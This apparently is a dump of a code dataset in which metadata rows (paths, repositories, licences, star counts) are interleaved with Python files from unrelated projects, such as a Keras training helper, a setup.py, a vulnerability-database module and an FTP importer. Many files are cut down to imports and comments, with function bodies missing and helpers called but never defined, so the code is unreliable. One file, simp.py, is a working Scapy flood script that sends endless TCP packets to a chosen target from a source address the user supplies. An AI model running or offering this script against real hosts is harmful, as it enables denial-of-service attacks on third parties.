'optimus': False,
'sandboxed': True,
'basic_info_state': 1,
'adapter_luid': 0.0,
'driver_version': '331.79',
'direct_rendering': True,
'amd_switchable': False,
'context_info_state': 1,
'process_crash_count': 0,
'pixel_shader_version': '4.40',
'gl_ws_version': '1.4',
'can_lose_context': False,
'driver_vendor': 'NVIDIA',
'max_msaa_samples': '64',
'software_rendering': False,
'gl_version': '4.4.0 NVIDIA 331.79',
'gl_ws_vendor': 'NVIDIA Corporation',
'vertex_shader_version': '4.40',
'initialization_time': 1.284043,
'gl_reset_notification_strategy': 33362,
'gl_ws_extensions':
'GLX_EXT_visual_info GLX_EXT_visual_rating GLX_SGIX_fbconfig '
'GLX_SGIX_pbuffer GLX_SGI_video_sync GLX_SGI_swap_control '
'GLX_EXT_swap_control GLX_EXT_swap_control_tear '
'GLX_EXT_texture_from_pixmap GLX_EXT_buffer_age '
'GLX_ARB_create_context GLX_ARB_create_context_profile '
'GLX_EXT_create_context_es_profile '
'GLX_EXT_create_context_es2_profile '
'GLX_ARB_create_context_robustness GLX_ARB_multisample '
'GLX_NV_float_buffer GLX_ARB_fbconfig_float GLX_NV_swap_group'
' GLX_EXT_framebuffer_sRGB GLX_NV_multisample_coverage '
'GLX_NV_copy_image GLX_NV_video_capture ',
'gl_renderer': 'Quadro 600/PCIe/SSE2',
'driver_date': '',
'gl_vendor': 'NVIDIA Corporation',
'gl_extensions':
'GL_AMD_multi_draw_indirect GL_ARB_arrays_of_arrays '
'GL_ARB_base_instance GL_ARB_blend_func_extended '
'GL_ARB_buffer_storage GL_ARB_clear_buffer_object '
'GL_ARB_clear_texture GL_ARB_color_buffer_float '
'GL_ARB_compatibility GL_ARB_compressed_texture_pixel_storage'
' GL_ARB_conservative_depth GL_ARB_compute_shader '
'GL_ARB_compute_variable_group_size GL_ARB_copy_buffer '
'GL_ARB_copy_image GL_ARB_debug_output '
'GL_ARB_depth_buffer_float GL_ARB_depth_clamp '
'GL_ARB_depth_texture GL_ARB_draw_buffers '
'GL_ARB_draw_buffers_blend GL_ARB_draw_indirect '
'GL_ARB_draw_elements_base_vertex GL_ARB_draw_instanced '
'GL_ARB_enhanced_layouts GL_ARB_ES2_compatibility '
'GL_ARB_ES3_compatibility GL_ARB_explicit_attrib_location '
'GL_ARB_explicit_uniform_location '
'GL_ARB_fragment_coord_conventions '
'GL_ARB_fragment_layer_viewport GL_ARB_fragment_program '
'GL_ARB_fragment_program_shadow GL_ARB_fragment_shader '
'GL_ARB_framebuffer_no_attachments GL_ARB_framebuffer_object '
'GL_ARB_framebuffer_sRGB GL_ARB_geometry_shader4 '
'GL_ARB_get_program_binary GL_ARB_gpu_shader5 '
'GL_ARB_gpu_shader_fp64 GL_ARB_half_float_pixel '
'GL_ARB_half_float_vertex GL_ARB_imaging '
'GL_ARB_indirect_parameters GL_ARB_instanced_arrays '
'GL_ARB_internalformat_query GL_ARB_internalformat_query2 '
'GL_ARB_invalidate_subdata GL_ARB_map_buffer_alignment '
'GL_ARB_map_buffer_range GL_ARB_multi_bind '
'GL_ARB_multi_draw_indirect GL_ARB_multisample '
'GL_ARB_multitexture GL_ARB_occlusion_query '
'GL_ARB_occlusion_query2 GL_ARB_pixel_buffer_object '
'GL_ARB_point_parameters GL_ARB_point_sprite '
'GL_ARB_program_interface_query GL_ARB_provoking_vertex '
'GL_ARB_robust_buffer_access_behavior GL_ARB_robustness '
'GL_ARB_sample_shading GL_ARB_sampler_objects '
'GL_ARB_seamless_cube_map GL_ARB_separate_shader_objects '
'GL_ARB_shader_atomic_counters GL_ARB_shader_bit_encoding '
'GL_ARB_shader_draw_parameters GL_ARB_shader_group_vote '
'GL_ARB_shader_image_load_store GL_ARB_shader_image_size '
'GL_ARB_shader_objects GL_ARB_shader_precision '
'GL_ARB_query_buffer_object '
'GL_ARB_shader_storage_buffer_object GL_ARB_shader_subroutine'
' GL_ARB_shader_texture_lod GL_ARB_shading_language_100 '
'GL_ARB_shading_language_420pack '
'GL_ARB_shading_language_include '
'GL_ARB_shading_language_packing GL_ARB_shadow '
'GL_ARB_stencil_texturing GL_ARB_sync '
'GL_ARB_tessellation_shader GL_ARB_texture_border_clamp '
'GL_ARB_texture_buffer_object '
'GL_ARB_texture_buffer_object_rgb32 '
'GL_ARB_texture_buffer_range GL_ARB_texture_compression '
'GL_ARB_texture_compression_bptc '
'GL_ARB_texture_compression_rgtc GL_ARB_texture_cube_map '
'GL_ARB_texture_cube_map_array GL_ARB_texture_env_add '
'GL_ARB_texture_env_combine GL_ARB_texture_env_crossbar '
'GL_ARB_texture_env_dot3 GL_ARB_texture_float '
'GL_ARB_texture_gather GL_ARB_texture_mirror_clamp_to_edge '
'GL_ARB_texture_mirrored_repeat GL_ARB_texture_multisample '
'GL_ARB_texture_non_power_of_two GL_ARB_texture_query_levels '
'GL_ARB_texture_query_lod GL_ARB_texture_rectangle '
'GL_ARB_texture_rg GL_ARB_texture_rgb10_a2ui '
'GL_ARB_texture_stencil8 GL_ARB_texture_storage '
'GL_ARB_texture_storage_multisample GL_ARB_texture_swizzle '
'GL_ARB_texture_view GL_ARB_timer_query '
'GL_ARB_transform_feedback2 GL_ARB_transform_feedback3 '
'GL_ARB_transform_feedback_instanced GL_ARB_transpose_matrix '
'GL_ARB_uniform_buffer_object GL_ARB_vertex_array_bgra '
'GL_ARB_vertex_array_object GL_ARB_vertex_attrib_64bit '
'GL_ARB_vertex_attrib_binding GL_ARB_vertex_buffer_object '
'GL_ARB_vertex_program GL_ARB_vertex_shader '
'GL_ARB_vertex_type_10f_11f_11f_rev '
'GL_ARB_vertex_type_2_10_10_10_rev GL_ARB_viewport_array '
'GL_ARB_window_pos GL_ATI_draw_buffers GL_ATI_texture_float '
'GL_ATI_texture_mirror_once GL_S3_s3tc GL_EXT_texture_env_add'
' GL_EXT_abgr GL_EXT_bgra GL_EXT_bindable_uniform '
'GL_EXT_blend_color GL_EXT_blend_equation_separate '
'GL_EXT_blend_func_separate GL_EXT_blend_minmax '
'GL_EXT_blend_subtract GL_EXT_compiled_vertex_array '
'GL_EXT_Cg_shader GL_EXT_depth_bounds_test '
'GL_EXT_direct_state_access GL_EXT_draw_buffers2 '
'GL_EXT_draw_instanced GL_EXT_draw_range_elements '
'GL_EXT_fog_coord GL_EXT_framebuffer_blit '
'GL_EXT_framebuffer_multisample '
'GL_EXTX_framebuffer_mixed_formats '
'GL_EXT_framebuffer_multisample_blit_scaled '
'GL_EXT_framebuffer_object GL_EXT_framebuffer_sRGB '
'GL_EXT_geometry_shader4 GL_EXT_gpu_program_parameters '
'GL_EXT_gpu_shader4 GL_EXT_multi_draw_arrays '
'GL_EXT_packed_depth_stencil GL_EXT_packed_float '
'GL_EXT_packed_pixels GL_EXT_pixel_buffer_object '
'GL_EXT_point_parameters GL_EXT_provoking_vertex '
'GL_EXT_rescale_normal GL_EXT_secondary_color '
'GL_EXT_separate_shader_objects '
'GL_EXT_separate_specular_color '
'GL_EXT_shader_image_load_store GL_EXT_shadow_funcs '
'GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_texture3D'
' GL_EXT_texture_array GL_EXT_texture_buffer_object '
'GL_EXT_texture_compression_dxt1 '
'GL_EXT_texture_compression_latc '
'GL_EXT_texture_compression_rgtc '
'GL_EXT_texture_compression_s3tc GL_EXT_texture_cube_map '
'GL_EXT_texture_edge_clamp GL_EXT_texture_env_combine '
'GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic '
'GL_EXT_texture_integer GL_EXT_texture_lod '
'GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp '
'GL_EXT_texture_object GL_EXT_texture_shared_exponent '
'GL_EXT_texture_sRGB GL_EXT_texture_sRGB_decode '
'GL_EXT_texture_storage GL_EXT_texture_swizzle '
'GL_EXT_timer_query GL_EXT_transform_feedback2 '
'GL_EXT_vertex_array GL_EXT_vertex_array_bgra '
'GL_EXT_vertex_attrib_64bit GL_EXT_x11_sync_object '
'GL_EXT_import_sync_object GL_IBM_rasterpos_clip '
'GL_IBM_texture_mirrored_repeat GL_KHR_debug '
'GL_KTX_buffer_region GL_NV_bindless_multi_draw_indirect '
'GL_NV_blend_equation_advanced GL_NV_blend_square '
'GL_NV_compute_program5 GL_NV_conditional_render '
'GL_NV_copy_depth_to_color GL_NV_copy_image '
'GL_NV_depth_buffer_float GL_NV_depth_clamp '
'GL_NV_draw_texture GL_NV_ES1_1_compatibility '
'GL_NV_explicit_multisample GL_NV_fence GL_NV_float_buffer '
'GL_NV_fog_distance GL_NV_fragment_program '
'GL_NV_fragment_program_option GL_NV_fragment_program2 '
'GL_NV_framebuffer_multisample_coverage '
'GL_NV_geometry_shader4 GL_NV_gpu_program4 '
'GL_NV_gpu_program4_1 GL_NV_gpu_program5 '
'GL_NV_gpu_program5_mem_extended GL_NV_gpu_program_fp64 '
'GL_NV_gpu_shader5 GL_NV_half_float GL_NV_light_max_exponent '
'GL_NV_multisample_coverage GL_NV_multisample_filter_hint '
'GL_NV_occlusion_query GL_NV_packed_depth_stencil '
'GL_NV_parameter_buffer_object GL_NV_parameter_buffer_object2'
' GL_NV_path_rendering GL_NV_pixel_data_range '
'GL_NV_point_sprite GL_NV_primitive_restart '
'GL_NV_register_combiners GL_NV_register_combiners2 '
'GL_NV_shader_atomic_counters GL_NV_shader_atomic_float '
'GL_NV_shader_buffer_load GL_NV_shader_storage_buffer_object '
'GL_ARB_sparse_texture GL_NV_texgen_reflection '
'GL_NV_texture_barrier GL_NV_texture_compression_vtc '
'GL_NV_texture_env_combine4 GL_NV_texture_expand_normal '
'GL_NV_texture_multisample GL_NV_texture_rectangle '
'GL_NV_texture_shader GL_NV_texture_shader2 '
'GL_NV_texture_shader3 GL_NV_transform_feedback '
'GL_NV_transform_feedback2 GL_NV_vdpau_interop '
'GL_NV_vertex_array_range GL_NV_vertex_array_range2 '
'GL_NV_vertex_attrib_integer_64bit '
'GL_NV_vertex_buffer_unified_memory GL_NV_vertex_program '
'GL_NV_vertex_program1_1 GL_NV_vertex_program2 '
'GL_NV_vertex_program2_option GL_NV_vertex_program3 '
'GL_NVX_conditional_render GL_NVX_gpu_memory_info '
'GL_SGIS_generate_mipmap GL_SGIS_texture_lod '
'GL_SGIX_depth_texture GL_SGIX_shadow GL_SUN_slice_accum '
},
'devices':
[
{
'device_string': '',
'vendor_id': 4318.0,
'device_id': 3576.0,
'vendor_string': ''
}],
'driver_bug_workarounds':
['clear_uniforms_before_first_program_use',
'disable_gl_path_rendering',
'init_gl_position_in_vertex_shader',
'init_vertex_attributes',
'remove_pow_with_constant_exponent',
'scalarize_vec_and_mat_constructor_args',
'use_current_program_after_successful_link',
'use_virtualized_gl_contexts']
}
| 57.086777 | 78 | 0.668983 |
fe759c78dfaceadf537006e1685f7155df52a71a | 10,073 | py | Python | vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | bf5da1788f9ede42086c31b3996d9e41363cc7ee | [
"MIT"
] | 6 | 2020-04-21T12:16:19.000Z | 2022-02-10T09:18:08.000Z | vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | bf5da1788f9ede42086c31b3996d9e41363cc7ee | [
"MIT"
] | 1 | 2021-12-07T13:09:53.000Z | 2021-12-07T13:09:53.000Z | vm_setup/pmevo/measurement-server/PITE/register_file.py | qcjiang/pmevo-artifact | bf5da1788f9ede42086c31b3996d9e41363cc7ee | [
"MIT"
] | 2 | 2021-03-30T12:40:01.000Z | 2021-11-23T15:49:50.000Z | #! /usr/bin/env python3
# vim: et:ts=4:sw=4:fenc=utf-8
from abc import ABC, abstractmethod
from collections import defaultdict
import re
| 54.448649 | 111 | 0.37119 |
fe75c11d0a13c6adf86f05d6ce0d9f94ca54fb9c | 5,410 | py | Python | src/training_utils/training.py | JoseLuisRojasAranda/tfmodels | 56dce0236f0cc03dd7031aecf305d470c9fb97a9 | [
"MIT"
] | 1 | 2020-06-05T23:25:03.000Z | 2020-06-05T23:25:03.000Z | src/training_utils/training.py | JoseLuisRojasAranda/tfmodels | 56dce0236f0cc03dd7031aecf305d470c9fb97a9 | [
"MIT"
] | null | null | null | src/training_utils/training.py | JoseLuisRojasAranda/tfmodels | 56dce0236f0cc03dd7031aecf305d470c9fb97a9 | [
"MIT"
] | null | null | null | import os
from os import path
import json
import shutil
import tensorflow as tf
import numpy as np
# Importa cosas de Keras API
from tensorflow.keras.optimizers import Adam, RMSprop
from tensorflow.keras.models import Sequential
from tensorflow.keras.utils import plot_model
# Importa callbacks del modelo
from training_utils.callbacks import TrainingCheckPoints
from tensorflow.keras.callbacks import CSVLogger, TensorBoard
# Importa cosas para graficar el entrenameinto
from training_utils.training_graphs import graph_confusion_matrix
from training_utils.training_graphs import graph_model_metrics
# Function that continues the training of a model
# Args:
# path_to_model: path were to find the model and setup
# dataset: tuple of tensorflow dataset of (train, test)
# Method that starts the model training
# Args:
# setup: Dictionary with the model setup
# model: the keras.Model architecture to train
# dataset: tuple of tensorflow dataset of (train, test)
# Metodo, que entrena un modelo ya compilado, implementa callbacks de
# tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre
# mejoras en el loss, tambien grafica y crea matriz de confusion
# Args:
# compiled_model: keras.Model ya compilado
# dataset: tuple of tensorflow dataset of (train, test)
# opt: keras.Optimizer used in training
# epochs: The number of epochs to train
# initial_epoch: Epoch to start training, 0 for normal training
# continue_train: if the model is continuing training
# classes: array of classes that the model predict
| 35.359477 | 84 | 0.697227 |
fe774ebe12faa6fdf372c8d9db66e886229109cb | 3,563 | py | Python | setup.py | truggles/pudl | 6f41664f8243b8f7aafdbbfc8522f96043dbf561 | [
"MIT"
] | null | null | null | setup.py | truggles/pudl | 6f41664f8243b8f7aafdbbfc8522f96043dbf561 | [
"MIT"
] | null | null | null | setup.py | truggles/pudl | 6f41664f8243b8f7aafdbbfc8522f96043dbf561 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Setup script to make PUDL directly installable with pip."""
import os
from pathlib import Path
from setuptools import find_packages, setup
install_requires = [
'coloredlogs',
'datapackage>=1.9.0',
'dbfread',
'goodtables',
'matplotlib',
'networkx>=2.2',
'numpy',
'pandas>=0.24',
'pyarrow>=0.14.0',
'pyyaml',
'scikit-learn>=0.20',
'scipy',
'sqlalchemy>=1.3.0',
'tableschema',
'tableschema-sql>=1.1.0',
'timezonefinder',
'xlsxwriter',
]
# We are installing the PUDL module to build the docs, but the C libraries
# required to build snappy aren't available on RTD, so we need to exclude it
# from the installed dependencies here, and mock it for import in docs/conf.py
# using the autodoc_mock_imports parameter:
if not os.getenv('READTHEDOCS'):
install_requires.append('python-snappy')
doc_requires = [
'doc8',
'sphinx',
'sphinx_rtd_theme',
]
test_requires = [
'bandit',
'coverage',
'doc8',
'flake8',
'flake8-docstrings',
'flake8-builtins',
'pep8-naming',
'pre-commit',
'pydocstyle',
'pytest',
'pytest-cov',
'nbval',
]
readme_path = Path(__file__).parent / "README.rst"
long_description = readme_path.read_text()
setup(
name='catalystcoop.pudl',
description='An open data processing pipeline for public US utility data.',
long_description=long_description,
long_description_content_type='text/x-rst',
use_scm_version=True,
author='Catalyst Cooperative',
author_email='pudl@catalyst.coop',
maintainer='Zane A. Selvans',
maintainer_email='zane.selvans@catalyst.coop',
url="https://catalyst.coop/pudl",
project_urls={
"Source": "https://github.com/catalyst-cooperative/pudl",
"Documentation": "https://catalystcoop-pudl.readthedocs.io",
"Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues",
},
license='MIT',
keywords=[
'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change',
'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd',
'epa cems', 'coal', 'natural gas', ],
python_requires='>=3.7, <3.8.0a0',
setup_requires=['setuptools_scm'],
install_requires=install_requires,
extras_require={
"doc": doc_requires,
"test": test_requires,
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
],
packages=find_packages('src'),
package_dir={'': 'src'},
# package_data is data that is deployed within the python package on the
# user's system. setuptools will get whatever is listed in MANIFEST.in
include_package_data=True,
# This defines the interfaces to the command line scripts we're including:
entry_points={
'console_scripts': [
'pudl_data = pudl.workspace.datastore_cli:main',
'pudl_setup = pudl.workspace.setup_cli:main',
'pudl_etl = pudl.cli:main',
'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main',
'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main',
'epacems_to_parquet = pudl.convert.epacems_to_parquet:main',
]
},
)
| 30.452991 | 79 | 0.641033 |
fe77c98170bf9d8232497412401b6f749ddb70f7 | 7,836 | py | Python | src/vulnix/nvd.py | dermetfan/vulnix | 06daccda0e51098fbdbc65f61b6663c5c6df9358 | [
"BSD-3-Clause"
] | 217 | 2016-07-03T10:45:56.000Z | 2022-03-30T12:06:51.000Z | src/vulnix/nvd.py | dermetfan/vulnix | 06daccda0e51098fbdbc65f61b6663c5c6df9358 | [
"BSD-3-Clause"
] | 70 | 2016-06-27T08:47:22.000Z | 2022-01-22T19:10:53.000Z | src/vulnix/nvd.py | dermetfan/vulnix | 06daccda0e51098fbdbc65f61b6663c5c6df9358 | [
"BSD-3-Clause"
] | 24 | 2016-06-27T09:23:50.000Z | 2022-01-30T05:32:22.000Z | from BTrees import OOBTree
from datetime import datetime, date, timedelta
from persistent import Persistent
from .vulnerability import Vulnerability
import fcntl
import glob
import gzip
import json
import logging
import os
import os.path as p
import requests
import transaction
import ZODB
import ZODB.FileStorage
DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/'
DEFAULT_CACHE_DIR = '~/.cache/vulnix'
_log = logging.getLogger(__name__)
| 32.786611 | 79 | 0.590225 |
fe7996f8bc015e9c1e0a7458bde9909f14df8fbf | 316 | py | Python | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-17T03:35:03.000Z | 2021-12-08T06:00:31.000Z | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | null | null | null | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-05T18:07:48.000Z | 2022-02-24T21:25:07.000Z | from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1 | 22.571429 | 42 | 0.550633 |
fe79e20af0abaadf27ef0edd6010a9d9587df465 | 2,019 | py | Python | test/test_basic_functions.py | azagajewski/ColiCoords | fa26e46971e24ff582c4d33331c5b8181f605c9f | [
"MIT"
] | 18 | 2018-09-11T01:14:31.000Z | 2021-12-27T10:21:59.000Z | test/test_basic_functions.py | azagajewski/ColiCoords | fa26e46971e24ff582c4d33331c5b8181f605c9f | [
"MIT"
] | 77 | 2018-09-19T09:28:33.000Z | 2021-11-12T13:31:50.000Z | test/test_basic_functions.py | azagajewski/ColiCoords | fa26e46971e24ff582c4d33331c5b8181f605c9f | [
"MIT"
] | 8 | 2019-06-17T16:02:32.000Z | 2021-06-30T23:31:17.000Z | import hashlib
import unittest
from colicoords.cell import Cell, CellList
from colicoords.preprocess import data_to_cells
from test import testcase
from test.test_functions import load_testdata
if __name__ == '__main__':
unittest.main() | 30.590909 | 93 | 0.618128 |
fe7a4e994d80d1a5a6af69534d2790e8dc14f03c | 4,354 | py | Python | data_importer_ftp.py | supsi-dacd-isaac/oasi-ozone-forecaster | 01d23c374e857dcc6d556d073c0380186c2934d2 | [
"MIT"
] | null | null | null | data_importer_ftp.py | supsi-dacd-isaac/oasi-ozone-forecaster | 01d23c374e857dcc6d556d073c0380186c2934d2 | [
"MIT"
] | null | null | null | data_importer_ftp.py | supsi-dacd-isaac/oasi-ozone-forecaster | 01d23c374e857dcc6d556d073c0380186c2934d2 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------- #
# Importing section
# --------------------------------------------------------------------------- #
import os
import sys
import argparse
import logging
import json
from classes.alerts import SlackClient
from influxdb import InfluxDBClient
from classes.data_manager import DataManager
# --------------------------------------------------------------------------- #
# Functions
# -----------------------------------------------------------------------------#
# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
conns_cfg = json.loads(open(cfg['connectionsFile']).read())
cfg.update(conns_cfg)
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
# --------------------------------------------------------------------------- #
# Starting program
# --------------------------------------------------------------------------- #
logger.info("Starting program")
# --------------------------------------------------------------------------- #
# InfluxDB connection
# --------------------------------------------------------------------------- #
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
dm = DataManager(influx_client, cfg, logger)
# Download files from the FTP server
if cfg['ftp']['enabled'] is True:
logger.info('Download data from FTP server')
dm.open_ftp_connection()
dm.download_remote_files()
# Insert data into InfluxDB
if cfg['influxDB']['dataImporting'] is True:
logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp'])
dm.insert_data()
# Delete files correctly handled on the FTP server and close the FTP connection
if cfg['ftp']['enabled'] is True:
if cfg['ftp']['deleteRemoteFile'] is True:
logger.info('Delete handled files from FTP server')
dm.delete_remote_files()
dm.close_ftp_connection()
# Slack alert
if cfg['alerts']['slack']['enabled'] is True:
slack_msg()
logger.info("Ending program")
| 41.075472 | 119 | 0.475195 |
fe7b77f497a02a03531071b294b121357332567e | 2,791 | py | Python | autoindent_code_JASS_war3map_j.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 117 | 2015-12-18T07:18:27.000Z | 2022-03-28T00:25:54.000Z | autoindent_code_JASS_war3map_j.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 8 | 2018-10-03T09:38:46.000Z | 2021-12-13T19:51:09.000Z | autoindent_code_JASS_war3map_j.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 28 | 2016-08-02T17:43:47.000Z | 2022-03-21T08:31:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import re
DEBUG = False
lines = """
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
""".strip().splitlines()
stack = []
items = []
for line in lines:
if line.startswith('globals'):
stack.append('globals')
elif line.startswith('endglobals'):
stack.pop(-1)
stack.append('endglobals')
elif line.startswith('function'):
stack.append('function')
elif line.startswith('endfunction'):
stack.pop(-1)
stack.append('endfunction')
elif line.startswith('loop'):
stack.append('loop')
elif line.startswith('endloop'):
stack.pop(-1)
stack.append('endloop')
elif line.startswith('if'):
stack.append('if')
elif line.startswith('elseif'):
stack.pop(-1)
stack.append('elseif')
elif line.startswith('else'):
stack.pop(-1)
stack.append('else')
elif line.startswith('endif'):
stack.pop(-1)
stack.append('endif')
else:
stack.append(line[:8] + '...')
indent = len(stack) - 1
line = merge_str_literal(line)
items.append(' ' * indent + line)
DEBUG and print(f'{indent}. {line!r}', stack)
# Add empty line after endglobals and endfunction
if line.startswith('endglobals') or line.startswith('endfunction'):
items.append('')
if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']:
stack.pop(-1)
new_text = '\n'.join(items).strip()
print(new_text)
"""
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
"""
| 23.258333 | 80 | 0.638839 |
fe7bebb9c7d420d8879b0fc07f857afa803296a1 | 5,656 | py | Python | python/addNewData.py | TruX-DTF/fixminer_source | 5ab2d6f582743c377eadb21cd466a3a25809bc2d | [
"MIT"
] | 5 | 2021-07-19T12:30:00.000Z | 2022-01-14T16:41:00.000Z | python/addNewData.py | SerVal-DTF/fixminer_source | 5ab2d6f582743c377eadb21cd466a3a25809bc2d | [
"MIT"
] | 10 | 2020-04-06T09:52:19.000Z | 2021-06-01T08:05:25.000Z | python/addNewData.py | SerVal-DTF/fixminer_source | 5ab2d6f582743c377eadb21cd466a3a25809bc2d | [
"MIT"
] | 5 | 2019-08-26T11:02:35.000Z | 2021-03-23T15:42:09.000Z | from common.commons import *
DATA_PATH = os.environ["DATA_PATH"]
| 39.552448 | 299 | 0.592999 |
fe7d3ca44a30c1b45cb010d74a7365ccccfb69bc | 691 | py | Python | app.py | aosjehdgus/transliteration | 1934999385863009cdf9f8806e949157d653a9f4 | [
"Apache-2.0"
] | null | null | null | app.py | aosjehdgus/transliteration | 1934999385863009cdf9f8806e949157d653a9f4 | [
"Apache-2.0"
] | null | null | null | app.py | aosjehdgus/transliteration | 1934999385863009cdf9f8806e949157d653a9f4 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import sys
import tensorflow as tf
import numpy as np
import data_utils
from translate import Transliteration
from flask import Flask, request, jsonify
transliteration = Transliteration()
app = Flask(__name__) # Flask , .
app.config['JSON_AS_ASCII'] = False # .
if __name__ == "__main__":
app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
| 24.678571 | 68 | 0.727931 |
fe7e1b8337434731ea17dce123e62981ed1e6ab4 | 87 | py | Python | pyano2/apps.py | mental689/pyano | 2bc75e79618392f2013dfde2ac8035fe5fa1dc61 | [
"MIT"
] | 1 | 2022-01-31T17:34:37.000Z | 2022-01-31T17:34:37.000Z | pyano2/apps.py | mental689/pyano | 2bc75e79618392f2013dfde2ac8035fe5fa1dc61 | [
"MIT"
] | null | null | null | pyano2/apps.py | mental689/pyano | 2bc75e79618392f2013dfde2ac8035fe5fa1dc61 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 14.5 | 33 | 0.747126 |
fe7f812fda345139b99dd24f883eb46ae8bf8541 | 609 | py | Python | cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | ec32b40d549b292f14acd11e6774686564539d3c | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | 1 | 2020-08-28T14:57:15.000Z | 2020-08-28T14:57:15.000Z | cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | ec32b40d549b292f14acd11e6774686564539d3c | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | null | null | null | cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | ec32b40d549b292f14acd11e6774686564539d3c | [
"FTL",
"zlib-acknowledgement",
"RSA-MD"
] | 1 | 2021-03-11T23:20:58.000Z | 2021-03-11T23:20:58.000Z | """
Interface to the env_build.xml file. This class inherits from EnvBase
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.env_base import EnvBase
logger = logging.getLogger(__name__)
| 33.833333 | 91 | 0.714286 |
fe8041c5c55101ae0dcfff5c78088fd9a509554f | 6,805 | py | Python | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | gnmerritt/volttron | ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3 | [
"Apache-2.0"
] | 1 | 2020-05-26T01:29:50.000Z | 2020-05-26T01:29:50.000Z | services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | gnmerritt/volttron | ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3 | [
"Apache-2.0"
